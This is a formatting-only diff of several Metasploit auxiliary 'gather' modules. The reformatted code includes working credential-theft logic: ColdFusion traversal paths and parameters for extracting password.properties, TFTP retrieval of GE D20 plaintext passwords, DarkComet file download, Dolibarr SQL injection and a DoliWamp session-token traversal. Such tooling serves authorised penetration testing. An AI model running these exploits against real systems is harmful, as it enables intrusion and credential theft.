res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
if (res[0, server_response.length] == server_response)
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")
find_published =
@@ -62,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
res = udp_sock.get(3)
if (res.index(server_list_pre) == 0) # good packet, with following data
print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n"))
print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length, res.length].gsub("\x00", "\r\n"))
end
else
print_error("Citrix did not report any Published Applications. Try the brute force module instead.")
modules/auxiliary/gather/citrix_published_bruteforce.rb
+17 -15
View File
@@ -7,24 +7,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
'Description' => %q{
This module attempts to brute force program names within the Citrix
Metaframe ICA server.
},
'Author' => [ 'aushack' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
'Description' => %q{
This module attempts to brute force program names within the Citrix
Metaframe ICA server.
},
'Author' => [ 'aushack' ],
'References' => [
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ]
]
))
)
)
register_options(
[
Opt::RPORT(1604),
])
]
)
end
def autofilter
@@ -142,11 +145,10 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
if (res[0, server_response.length] == server_response)
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
applications.each do |application|
# Create the packet
packet = [52 + application.length].pack('C')
packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -161,11 +163,11 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(packet)
res = udp_sock.get(3)
if (res[0,application_valid.length] == application_valid)
if (res[0, application_valid.length] == application_valid)
print_status("Found: #{application}")
end
if (res[0,application_invalid.length] == application_invalid)
if (res[0, application_invalid.length] == application_invalid)
print_error("NOT Found: #{application}")
end
end
modules/auxiliary/gather/coldfusion_pwd_props.rb
+71 -70
View File
@@ -8,43 +8,45 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "ColdFusion 'password.properties' Hash Extraction",
'Description' => %q{
super(
update_info(
info,
'Name' => "ColdFusion 'password.properties' Hash Extraction",
'Description' => %q{
This module uses a directory traversal vulnerability to extract information
such as password, rdspassword, and "encrypted" properties. This module has been
tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
},
'References' =>
[
such as password, rdspassword, and "encrypted" properties. This module has been
tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
},
'References' => [
[ 'CVE', '2013-3336' ],
[ 'OSVDB', '93114' ],
[ 'EDB', '25305' ]
],
'Author' =>
[
'Author' => [
'HTP',
'sinn3r',
'nebulus'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-05-07' #The day we saw the subzero poc
))
'License' => MSF_LICENSE,
# The day we saw the subzero poc
'DisclosureDate' => '2013-05-07'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
])
]
)
end
def fingerprint(response)
if(response.headers.has_key?('Server') )
if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
if (response.headers.has_key?('Server'))
if (response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
os = "Windows (#{response.headers['Server']})"
elsif(response.headers['Server'] =~ /Apache\//)
os = "Unix (#{response.headers['Server']})"
elsif (response.headers['Server'] =~ /Apache\//)
os = "Unix (#{response.headers['Server']})"
else
os = response.headers['Server']
end
@@ -54,41 +56,41 @@ class MetasploitModule < Msf::Auxiliary
title = "Not Found"
response.body.gsub!(/[\r\n]/, '')
if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
if (response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
title = $1
title.gsub!(/\s/, '')
end
return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
return nil if (title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
out = nil
if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
if (response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
v = $1
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 (Not Vulnerable)" : "Adobe ColdFusion MX7 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/)
out = "Adobe ColdFusion MX7 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
out = "Adobe ColdFusion 8 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
out = "Adobe ColdFusion 10"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
elsif (response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
out = $1.split(/,/)[0]
else
out = 'Unknown ColdFusion'
end
if(title.downcase == 'coldfusionadministrator')
if (title.downcase == 'coldfusionadministrator')
out << " (you have administrator access)"
end
out << " (#{os})"
file = ''
trav = ''
if(os =~ /Windows/ )
if (os =~ /Windows/)
trav = '..\..\..\..\..\..\..\..\..\..'
file = (out =~ /ColdFusion 9/) ? '\ColdFusion9\lib\password.properties' : '\ColdFusion10\CFusion\lib\password.properties'
else
@@ -96,13 +98,13 @@ class MetasploitModule < Msf::Auxiliary
file = (out =~ /ColdFusion 9/) ? '/opt/coldfusion9/lib/password.properties' : '/opt/coldfusion10/cfusion/lib/password.properties'
end
if(response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
if (response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
print_error("#{peer} Fingerprint failed...aborting")
print_status("response: #{response.body}")
return nil,nil
return nil, nil
end
return out,"#{trav}#{file}"
return out, "#{trav}#{file}"
end
def check
@@ -117,26 +119,26 @@ class MetasploitModule < Msf::Auxiliary
vuln = false
url = '/CFIDE/adminapi/customtags/l10n.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if (res != nil)
# can't stack b/c res.code won't exist if res is nil
vuln = true if (res.code == 500 and res.body =~ /attributes\.id was not provided/)
end
if (vuln)
url = '/CFIDE/administrator/mail/download.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if(res != nil)
# can't stack b/c res.code won't exist if res is nil
vuln = true if(res.code == 500 and res.body =~ /attributes\.id was not provided/)
end
if(vuln)
url = '/CFIDE/administrator/mail/download.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if(res != nil)
})
if (res != nil)
vuln = false if (res.code != 200)
end
end
@@ -144,18 +146,17 @@ class MetasploitModule < Msf::Auxiliary
return vuln
end
def run
filename = ""
url = '/CFIDE/administrator/index.cfm'
# print_status("Getting index...")
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
# print_status("Got back: #{res.inspect}")
return if not res
return if not res.body or not res.code
@@ -164,31 +165,31 @@ class MetasploitModule < Msf::Auxiliary
out, filename = fingerprint(res)
print_status("#{peer} #{out}") if out
if(out =~ /Not Vulnerable/)
if (out =~ /Not Vulnerable/)
print_status("#{peer} isn't vulnerable to this attack")
return
end
if(not check_cf)
if (not check_cf)
print_status("#{peer} can't be exploited (either files missing or permissions block access)")
return
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
'encode_params' => false,
'encode' => false,
'vars_get' => {
'attributes.id' => 'it',
'attributes.file' => '../../administrator/mail/download.cfm',
'filename' => filename,
'attributes.locale' => 'it',
'attributes.var' => 'it',
'attributes.jscript' => 'false',
'attributes.type' => 'text/html',
'attributes.charset' => 'UTF-8',
'thisTag.executionmode' => 'end',
'attributes.id' => 'it',
'attributes.file' => '../../administrator/mail/download.cfm',
'filename' => filename,
'attributes.locale' => 'it',
'attributes.var' => 'it',
'attributes.jscript' => 'false',
'attributes.type' => 'text/html',
'attributes.charset' => 'UTF-8',
'thisTag.executionmode' => 'end',
'thisTag.generatedContent' => 'htp'
}
})
@@ -198,9 +199,9 @@ class MetasploitModule < Msf::Auxiliary
return
end
rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
password = res.body.scan(/^password=(.+)/).flatten[0] || ''
encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''
rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
password = res.body.scan(/^password=(.+)/).flatten[0] || ''
encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''
if rdspass.empty? and password.empty?
# No pass collected, no point to store anything
modules/auxiliary/gather/corpwatch_lookup_id.rb
+59 -53
View File
@@ -9,33 +9,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' => [
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
)
)
deregister_http_client_options
register_options(
[
OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
OptBool.new('GET_HISTORY', [false, "Get company history", false])
])
]
)
end
def rhost_corpwatch
@@ -47,17 +50,16 @@ class MetasploitModule < Msf::Auxiliary
end
def run
loot = ""
uri = "/"
uri << (datastore['YEAR']).to_s if datastore['YEAR'].to_s != ""
uri << ("/companies/" + datastore['CW_ID'])
res = send_request_cgi({
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + ".xml",
'method' => 'GET'
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + ".xml",
'method' => 'GET'
}, 25)
if res == nil
@@ -116,13 +118,13 @@ class MetasploitModule < Msf::Auxiliary
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
loot << ("\nMinimum searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_status("Basic Information\n--------------------")
@@ -152,12 +154,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_LOCATIONS']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -190,9 +193,9 @@ class MetasploitModule < Msf::Auxiliary
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
loot << ("\nCity: " + (city = grab_text(e, "city")))
@@ -224,12 +227,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_NAMES']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -286,12 +290,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_FILINGS']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or response broken")
@@ -366,12 +371,13 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => child_uri,
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => child_uri,
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -448,10 +454,10 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_HISTORY']
res = send_request_cgi({
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/history.xml",
'method' => 'GET'
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/history.xml",
'method' => 'GET'
}, 25)
if res == nil
@@ -524,7 +530,7 @@ class MetasploitModule < Msf::Auxiliary
end
end
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info", "text/plain", nil, loot, "company_#{datastore['CW_ID']}.txt", "#{datastore["CW_ID"]} Specific Information")
print_line()
print_status("Saved in: #{p}")
@@ -532,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
modules/auxiliary/gather/corpwatch_lookup_name.rb
+30 -27
View File
@@ -10,30 +10,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
super(
update_info(
info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given company name. Please note that by using CorpWatch API, you
acknowledge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
info for a given company name. Please note that by using CorpWatch API, you
acknowledge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' => [
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
)
)
deregister_http_client_options
register_options(
[
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
])
]
)
end
def rhost_corpwatch
@@ -45,24 +48,24 @@ class MetasploitModule < Msf::Auxiliary
end
def run
uri = "/"
uri << (datastore['YEAR'].to_s + "/") if datastore['YEAR'].to_s != ""
uri << "companies.xml"
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25)
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25
)
if not res
print_error("Server down, bad response")
@@ -126,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
e.get_elements(name)[0].get_text) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
modules/auxiliary/gather/d20pass.rb
+35 -30
View File
@@ -8,7 +8,6 @@
# parses the usernames and passwords from it.
##
class MetasploitModule < Msf::Auxiliary
include Rex::Ui::Text
include Rex::Proto::TFTP
@@ -16,28 +15,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'General Electric D20 Password Recovery',
'Description' => %q{
The General Electric D20ME and possibly other units (D200?) feature
TFTP readable configurations with plaintext passwords. This module
retrieves the username, password, and authentication level list.
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
super(
update_info(
info,
'Name' => 'General Electric D20 Password Recovery',
'Description' => %q{
The General Electric D20ME and possibly other units (D200?) feature
TFTP readable configurations with plaintext passwords. This module
retrieves the username, password, and authentication level list.
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2012-6663'],
],
'DisclosureDate' => '2012-01-19'
))
'DisclosureDate' => '2012-01-19'
)
)
register_options(
[
Opt::RPORT(69),
Opt::RHOST('192.168.255.1'),
OptString.new('REMOTE_CONFIG_NAME', [true, "The remote filename used to retrieve the configuration", "NVRAM\\D20.zlb"])
])
]
)
end
def setup
@@ -51,16 +53,16 @@ class MetasploitModule < Msf::Auxiliary
def cleanup
if @tftp_client and @tftp_client.respond_to? :complete
while not @tftp_client.complete
select(nil,nil,nil,1)
select(nil, nil, nil, 1)
vprint_status "Cleaning up the TFTP client ports and threads."
@tftp_client.stop
end
end
end
def rtarget(ip=nil)
def rtarget(ip = nil)
if (ip or rhost) and rport
[(ip || rhost),rport].map {|x| x.to_s}.join(":") << " "
[(ip || rhost), rport].map { |x| x.to_s }.join(":") << " "
elsif (ip or rhost)
rhost
else
@@ -72,12 +74,12 @@ class MetasploitModule < Msf::Auxiliary
def retrieve
print_status("Retrieving file")
@tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => @lhost,
"LocalPort" => @lport,
"PeerHost" => @rhost,
"PeerPort" => @rport,
"RemoteFile" => @rfile,
"Action" => :download
"LocalHost" => @lhost,
"LocalPort" => @lport,
"PeerHost" => @rhost,
"PeerPort" => @rport,
"RemoteFile" => @rfile,
"Action" => :download
)
@tftp_client.send_read_request { |msg| print_tftp_status(msg) }
@tftp_client.threads do |thread|
@@ -95,6 +97,7 @@ class MetasploitModule < Msf::Auxiliary
def makeword(bytestr)
return bytestr.unpack("n")[0]
end
# builds abi
def makelong(bytestr)
return bytestr.unpack("N")[0]
@@ -160,6 +163,7 @@ class MetasploitModule < Msf::Auxiliary
if name == myname
return start
end
left = leftchild(f, start)
right = rightchild(f, start)
if name < myname
@@ -222,9 +226,10 @@ class MetasploitModule < Msf::Auxiliary
logins = Rex::Text::Table.new(
'Header' => "D20 usernames, passwords, and account levels\n(use for TELNET authentication)",
'Indent' => 1,
'Columns' => ["Type", "User Name", "Password"])
'Columns' => ["Type", "User Name", "Password"]
)
0.upto(numentries -1).each do |i|
0.upto(numentries - 1).each do |i|
f.seek(dstart + headerlen + i * entrylen)
accounttype = makeword(f.read(2))
f.seek(dstart + headerlen + i * entrylen + 2)
@@ -235,7 +240,7 @@ class MetasploitModule < Msf::Auxiliary
print_error("Bad account parsing at #{dstart + headerlen + i * entrylen}")
break
end
logins << [accounttype, accountname, accountpass]
logins << [accounttype, accountname, accountpass]
report_cred(
ip: datastore['RHOST'],
port: 23,
@@ -289,11 +294,11 @@ class MetasploitModule < Msf::Auxiliary
def print_tftp_status(msg)
case msg
when /Aborting/, /errors.$/
print_error [rtarget,msg].join
print_error [rtarget, msg].join
when /^WRQ accepted/, /^Sending/, /complete!$/
print_good [rtarget,msg].join
print_good [rtarget, msg].join
else
vprint_status [rtarget,msg].join
vprint_status [rtarget, msg].join
end
end
end
modules/auxiliary/gather/darkcomet_filedownloader.rb
+17 -15
View File
@@ -8,26 +8,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DarkComet Server Remote File Download Exploit',
'Description' => %q{
This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
The exploit does not need to know the password chosen for the bot/server communication.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'DarkComet Server Remote File Download Exploit',
'Description' => %q{
This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
The exploit does not need to know the password chosen for the bot/server communication.
},
'License' => MSF_LICENSE,
'Author' => [
'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
],
'References' =>
[
'References' => [
[ 'URL', 'https://www.nccgroup.com/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
],
'DisclosureDate' => '2012-10-08',
'Platform' => 'win'
))
'DisclosureDate' => '2012-10-08',
'Platform' => 'win'
)
)
register_options(
[
@@ -41,7 +42,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])
])
]
)
end
# Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
modules/auxiliary/gather/dolibarr_creds_sqli.rb
+39 -35
View File
@@ -7,39 +7,43 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dolibarr Gather Credentials via SQL Injection',
'Description' => %q{
This module enables an authenticated user to collect the usernames and
encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
injection.
},
'Author' => [
'Issam Rabhi', # PoC
'Kevin Locati', # PoC
'Shelby Pace', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-10094' ],
[ 'EDB', '44805']
],
'DisclosureDate' => '2018-05-30'
))
super(
update_info(
info,
'Name' => 'Dolibarr Gather Credentials via SQL Injection',
'Description' => %q{
This module enables an authenticated user to collect the usernames and
encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
injection.
},
'Author' => [
'Issam Rabhi', # PoC
'Kevin Locati', # PoC
'Shelby Pace', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-10094' ],
[ 'EDB', '44805']
],
'DisclosureDate' => '2018-05-30'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
])
]
)
end
def check_availability
login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(login_page)
'method' => 'GET',
'uri' => normalize_uri(login_page)
)
return false unless res && res.body.include?('Dolibarr')
@@ -55,15 +59,15 @@ class MetasploitModule < Msf::Auxiliary
print_status("Logging in...")
login_res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginfunction' => 'loginfunction'
}
)
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginfunction' => 'loginfunction'
}
)
unless login_res && login_res.body.include?('id="mainmenua_members"')
fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
@@ -81,13 +85,13 @@ class MetasploitModule < Msf::Auxiliary
inject_uri <<= cmd
inject_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(inject_uri),
'cookie' => cookies
'method' => 'GET',
'uri' => normalize_uri(inject_uri),
'cookie' => cookies
)
unless inject_res && inject_res.body.include?('id="searchFormList"')
fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
end
print_good("Accessed credentials")
modules/auxiliary/gather/doliwamp_traversal_creds.rb
+48 -42
View File
@@ -8,31 +8,34 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
'Description' => %q{
super(
update_info(
info,
'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
'Description' => %q{
This module will extract user credentials from DoliWamp - a WAMP
packaged installer distribution for Dolibarr ERP on Windows - versions
3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
tokens in filenames in the 'tmp' directory. A directory traversal
vulnerability in 'jqueryFileTree.php' allows unauthenticated users
to retrieve session tokens by listing the contents of this directory.
Note: All tokens expire after 30 minutes of inactivity by default.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles',
'References' =>
[
packaged installer distribution for Dolibarr ERP on Windows - versions
3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
tokens in filenames in the 'tmp' directory. A directory traversal
vulnerability in 'jqueryFileTree.php' allows unauthenticated users
to retrieve session tokens by listing the contents of this directory.
Note: All tokens expire after 30 minutes of inactivity by default.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles',
'References' => [
['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
],
'DisclosureDate' => '2014-01-12'))
'DisclosureDate' => '2014-01-12'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
OptString.new('TRAVERSAL_PATH', [true, 'The traversal path to the application tmp directory', '../../../../../../../../tmp/'])
])
]
)
end
#
@@ -42,11 +45,12 @@ class MetasploitModule < Msf::Auxiliary
tokens = nil
print_status("Finding session tokens...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
